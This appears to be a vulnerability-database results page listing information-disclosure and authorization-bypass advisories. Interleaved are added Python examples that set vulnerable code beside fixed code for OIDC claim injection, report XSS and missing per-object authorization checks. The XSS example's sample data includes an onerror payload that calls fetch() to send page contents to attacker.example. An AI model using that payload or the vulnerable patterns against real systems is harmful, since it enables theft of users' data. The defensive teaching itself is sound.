2547 matches found
EUVD-2025-201758
In multiple files, there is a possible way to reveal information across users due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation...
Google Android Security Vulnerability
Google Android is a Linux-based open source operating system from the American company Google. Google Android suffers from a security vulnerability that stems from a lack of permission checking, which could lead to cross-user information disclosure...
CVE-2025-66510 Nextcloud Server Contacts Search allowed users to retrieve contact information of other users beyond their contact list
Nextcloud Server is a self-hosted personal cloud system. In Nextcloud Server prior to 31.0.10 and 32.0.1 and Nextcloud Enterprise Server prior to 28.0.14.11, 29.0.16.8, 30.0.17.3, and 31.0.10, the contacts search allowed users to retrieve personal data of other users (emails, names, identifiers) without prop...
[SECURITY] Fedora 43 Update: kf6-kcoreaddons-6.20.0-2.fc43
KCoreAddons provides classes built on top of QtCore to perform various tasks such as manipulating mime types, autosaving files, creating backup files, generating random sequences, performing text manipulations such as macro replacement, accessing user information and many more...
Adobe Experience Manager (AEM) Sling User Information Servlet Exposure
The remote Adobe Experience Manager AEM Sling User Information Servlet is prone to information disclosure vulnerabilities. An attacker can exploit this issue to gather information about user accounts, including usernames and other details, which could be used in subsequent attacks such as...
CVE-2025-13829
Incorrect Authorization vulnerability in Data Illusion Zumbrunn NGSurvey allows any logged-in user to obtain the private information of any other user. Critical information retrieved: APIKEY (1 year), user Session RefreshToken (10 minutes), user Session Password (hashed with bcrypt), User IP, Email, Full Na...
Hacker Selling Alleged Samsung Medison Data Stolen In 3rd Party Breach
Hacker using the alias 888, claims to be selling Samsung Medison data taken through a third party breach, including internal files, keys and user info...
CVE-2025-12639
The WordPress plugin wModes – Catalog Mode, Product Pricing, Enquiry Forms & Promotions (WooCommerce) is affected by CVE-2025-12639. Versions up to and including 1.2.2 are vulnerable to an authorization bypass via an AJAX endpoint, enabling authenticated attackers with subscriber-level access and...
Linux Distros Unpatched Vulnerability : CVE-2025-52331
The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - Cross-site scripting XSS vulnerability in the generate report functionality in Rarlab WinRAR 7.11, allows attackers to disclose user information such as the...
CVE-2025-52331
Cross-site scripting XSS vulnerability in the generate report functionality in Rarlab WinRAR 7.11, allows attackers to disclose user information such as the computer username, generated report directory, and IP address. The generate report command includes archived file names without validation i...
OpenAM: Using arbitrary OIDC requested claims values in id_token and user_info is allowed
Summary If the "claimsparametersupported" parameter is activated, it is possible through the "oidc-claims-extension.groovy" script, to inject the value of choice into a claim contained in the idtoken or in the userinfo. Authorization function requests do not prevent a claims parameter containing ...
CVE-2025-64099 OpenAM allows use of arbitrary OIDC requested claims values in id_token and user_info
Open Access Management OpenAM is an access management solution. In versions prior to 16.0.0, if the "claimsparametersupported" parameter is activated, it is possible, thanks to the "oidc-claims-extension.groovy" script, to inject the value of one's choice into a claim contained in the idtoken or ...
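The two OpenAM entries above describe an authorization server that lets the `claims` request parameter decide not just which claims appear in the id_token or userinfo response but what value they carry. The following is an added Python example, not OpenAM's code and not its oidc-claims-extension.groovy script: it contrasts a claims builder that copies a request-supplied `value`/`values` into the token with one that treats them only as a filter over the authoritative profile, which is what the OIDC Core `claims` parameter semantics call for. The profile record, the crafted request and the function names are assumptions for the demo.

```python
"""Added example, not OpenAM's code: how an authorization server should treat
the OIDC `claims` request parameter when building id_token / userinfo claims.
The profile record and the requests below are constructed for the demo."""
import json

# Constructed identity-store record for the authenticated subject.
PROFILE = {
    "sub": "u-1001",
    "email": "alice@example.org",
    "email_verified": True,
    "role": "viewer",
}

# Constructed `claims` authorization-request parameter crafted by a client:
# it asks for `role` and supplies a value the subject does not actually have.
REQUESTED = json.dumps({
    "id_token": {"role": {"value": "admin"}, "email": {"essential": True}},
    "userinfo": {"email_verified": {"value": True}, "phone_number": None},
})

# Constructed request that cannot be satisfied honestly and is marked essential.
ESSENTIAL_MISMATCH = json.dumps({
    "id_token": {"role": {"value": "admin", "essential": True}},
})


def build_claims_vulnerable(profile, claims_param, target):
    """The bug class: request-supplied `value`/`values` are copied into the token."""
    requested = json.loads(claims_param).get(target, {})
    out = {"sub": profile["sub"]}
    for name, spec in requested.items():
        spec = spec or {}
        if "value" in spec:
            out[name] = spec["value"]          # trusts the client
        elif "values" in spec:
            out[name] = spec["values"][0]      # same problem
        elif name in profile:
            out[name] = profile[name]
    return out


def build_claims_fixed(profile, claims_param, target):
    """`value`/`values` only filter the authoritative profile; they are never a
    source of claim data. A claim whose real value does not satisfy the request
    is omitted, and an unsatisfiable essential claim fails the request."""
    requested = json.loads(claims_param).get(target, {})
    out = {"sub": profile["sub"]}
    for name, spec in requested.items():
        spec = spec or {}
        actual = profile.get(name)
        satisfied = (
            name in profile
            and ("value" not in spec or actual == spec["value"])
            and ("values" not in spec or actual in spec["values"])
        )
        if satisfied:
            out[name] = actual
        elif spec.get("essential"):
            raise PermissionError(f"essential claim {name!r} cannot be satisfied")
    return out


def issue_or_reject(profile, claims_param, target):
    """How a token endpoint would surface the result: claims, or a refusal."""
    try:
        return {"ok": True, "claims": build_claims_fixed(profile, claims_param, target)}
    except PermissionError as exc:
        return {"ok": False, "error": str(exc)}


if __name__ == "__main__":
    print("vulnerable id_token:", build_claims_vulnerable(PROFILE, REQUESTED, "id_token"))
    print("fixed id_token:     ", build_claims_fixed(PROFILE, REQUESTED, "id_token"))
    print("fixed userinfo:     ", build_claims_fixed(PROFILE, REQUESTED, "userinfo"))
    print("essential mismatch: ", issue_or_reject(PROFILE, ESSENTIAL_MISMATCH, "id_token"))
```

The distinction matters because relying parties treat id_token claims as assertions made by the issuer; any code path (including a customisation script) that lets client-controlled JSON become a claim value turns the `claims` parameter into a privilege-escalation channel.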
UBUNTU-CVE-2025-52331
Cross-site scripting XSS vulnerability in the generate report functionality in Rarlab WinRAR 7.11, allows attackers to disclose user information such as the computer username, generated report directory, and IP address. The generate report command includes archived file names without validation i...
Rarlab WinRAR Security Vulnerability
Rarlab WinRAR is file compression/decompression software from Rarlab. A security vulnerability exists in Rarlab WinRAR version 7.11 that stems from cross-site scripting in the Generate Report function and could lead to the disclosure of user information...
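The WinRAR entries above describe a generated HTML report that embeds archived file names without validation, so an entry name chosen by whoever built the archive runs in the report and can read the username, report directory and other page content. The following is an added Python example, not WinRAR code: it reproduces that pattern on a constructed archive listing and shows the escaped version. The archive name, entry names, username and output folder are assumptions for the demo, and the audit parses the result with the standard library HTML parser rather than a regex so that escaped text is not mistaken for live markup.

```python
"""Added example, not WinRAR's code: an HTML report that pastes archive entry
names straight into markup, and the escaped version. Archive name, entry
names, username and output folder are constructed for the demo."""
import html
from html.parser import HTMLParser

# Constructed sample: the last entry name is attacker-controlled markup that an
# archive author can put in an entry name; it exfiltrates the page text, which
# in a real report would include the username and report directory.
SAMPLE_ENTRIES = [
    "docs/readme.txt",
    "src/main.c",
    '<img src=x onerror="fetch(\'https://attacker.example/?u=\'+document.body.innerText)">',
]


def build_report_vulnerable(archive_name, entries, generated_by, out_dir):
    """The flawed pattern: untrusted entry names interpolated without escaping."""
    rows = "".join(f"<tr><td>{name}</td></tr>" for name in entries)
    return (
        "<html><body>"
        f"<h1>Report for {archive_name}</h1>"
        f"<p>User: {generated_by}</p><p>Folder: {out_dir}</p>"
        f"<table>{rows}</table></body></html>"
    )


def build_report_fixed(archive_name, entries, generated_by, out_dir):
    """Every value that did not come from the report template is HTML-escaped."""
    e = html.escape  # escapes < > & and both quote characters
    rows = "".join(f"<tr><td>{e(name)}</td></tr>" for name in entries)
    return (
        "<html><body>"
        f"<h1>Report for {e(archive_name)}</h1>"
        f"<p>User: {e(generated_by)}</p><p>Folder: {e(out_dir)}</p>"
        f"<table>{rows}</table></body></html>"
    )


class TagAudit(HTMLParser):
    """Parses a report the way a browser would and records any tag that is
    not one of the template's own, plus any on* event-handler attribute."""
    TEMPLATE_TAGS = {"html", "body", "h1", "p", "table", "tr", "td"}

    def __init__(self):
        super().__init__()
        self.unexpected_tags = []
        self.event_handlers = []

    def handle_starttag(self, tag, attrs):
        if tag not in self.TEMPLATE_TAGS:
            self.unexpected_tags.append(tag)
        for attr_name, _ in attrs:
            if attr_name.startswith("on"):
                self.event_handlers.append(f"{tag}@{attr_name}")


def audit_report(report_html):
    """Returns (unexpected tags, event handlers) found by a real HTML parse."""
    parser = TagAudit()
    parser.feed(report_html)
    parser.close()
    return parser.unexpected_tags, parser.event_handlers


if __name__ == "__main__":
    args = ("evil.rar", SAMPLE_ENTRIES, "alice", r"C:\Users\alice\Reports")
    print("vulnerable:", audit_report(build_report_vulnerable(*args)))
    print("fixed:     ", audit_report(build_report_fixed(*args)))
```

Escaping at the point of interpolation is the whole fix; filtering entry names on the way into the archive is not an option, since the archive is the untrusted input.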
CVE-2025-41343
A lack of authorisation vulnerability has been detected in CanalDenuncia.app. This vulnerability allows an attacker to access other users' information by sending a POST through the parameter 'email' in '/backend/api/users/searchUserByEmail.php'...
CVE-2025-41337
A lack of authorisation vulnerability has been detected in CanalDenuncia.app. This vulnerability allows an attacker to access other users' information by sending a POST through the parameter 'web' in '/backend/api/buscarSSOParametros.php'...
CanalDenuncia App Security Vulnerability
CanalDenuncia App is a whistleblowing-channel application from the Spanish company CanalDenuncia. A security vulnerability exists in CanalDenuncia App that stems from a lack of authorization checking and allows an attacker to send a POST request to access other users' information via the paramete...
CVE-2025-60800
Incorrect access control in the /jshERP-boot/user/info interface of jshERP up to commit 90c411a allows attackers to access sensitive information via a crafted GET request...
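Several entries on this page (CanalDenuncia's searchUserByEmail.php, jshERP's /user/info, the Nextcloud contacts search and NGSurvey) share one bug class: the endpoint checks that the caller is logged in but not whether the caller may see the record it returns. The following is an added Python example and is not the code of any of those projects. It models a lookup-by-email endpoint in both forms; the user table, session object, field sets and the (status, body) return shape are assumptions for the demo, and the field names mirror the kinds of data the NGSurvey entry lists.

```python
"""Added example, not the code of CanalDenuncia, jshERP, Nextcloud or NGSurvey:
a lookup-by-email endpoint that hands any authenticated caller another user's
full record, and a version with the missing object-level check. Users,
sessions, field sets and the endpoint's return shape are constructed here."""
from dataclasses import dataclass
from typing import Optional

# Constructed user table. The fields echo what the advisories above list:
# identifiers, e-mail, IP address, API key and a credential hash.
USERS = {
    "alice@example.org": {
        "id": 1, "name": "Alice", "email": "alice@example.org",
        "ip": "203.0.113.5", "api_key": "ak_live_alice", "password_hash": "$2b$12$..."},
    "bob@example.org": {
        "id": 2, "name": "Bob", "email": "bob@example.org",
        "ip": "198.51.100.7", "api_key": "ak_live_bob", "password_hash": "$2b$12$..."},
}

PUBLIC_FIELDS = {"id", "name"}      # what the product lets any user see about others
NEVER_RETURN = {"password_hash"}    # credential material: not even to the owner


@dataclass(frozen=True)
class Session:
    user_id: int
    role: str  # "user" or "admin"


def search_user_by_email_vulnerable(session: Optional[Session], email: str):
    """Authentication only: any logged-in caller gets the whole record."""
    if session is None:
        return 401, None
    record = USERS.get(email)
    return (200, dict(record)) if record else (404, None)


def search_user_by_email_fixed(session: Optional[Session], email: str):
    """Authentication plus authorization: the result depends on who is asking."""
    if session is None:
        return 401, None
    record = USERS.get(email)
    if record is None:
        return 404, None
    if session.role == "admin" or record["id"] == session.user_id:
        # Owner or administrator view, still without credential material.
        return 200, {k: v for k, v in record.items() if k not in NEVER_RETURN}
    # Someone else's record: only the product's public view. If cross-user
    # lookup is not a feature at all, return 404 here as well so the response
    # does not confirm which e-mail addresses are registered.
    return 200, {k: v for k, v in record.items() if k in PUBLIC_FIELDS}


if __name__ == "__main__":
    bob = Session(user_id=2, role="user")
    print("vulnerable:", search_user_by_email_vulnerable(bob, "alice@example.org"))
    print("fixed:     ", search_user_by_email_fixed(bob, "alice@example.org"))
    print("own record:", search_user_by_email_fixed(bob, "bob@example.org"))
```

The check belongs in the handler that loads the object, keyed on the identity from the session, not on anything in the request body; an `email`, `id` or `web` parameter is just a lookup key the caller chose.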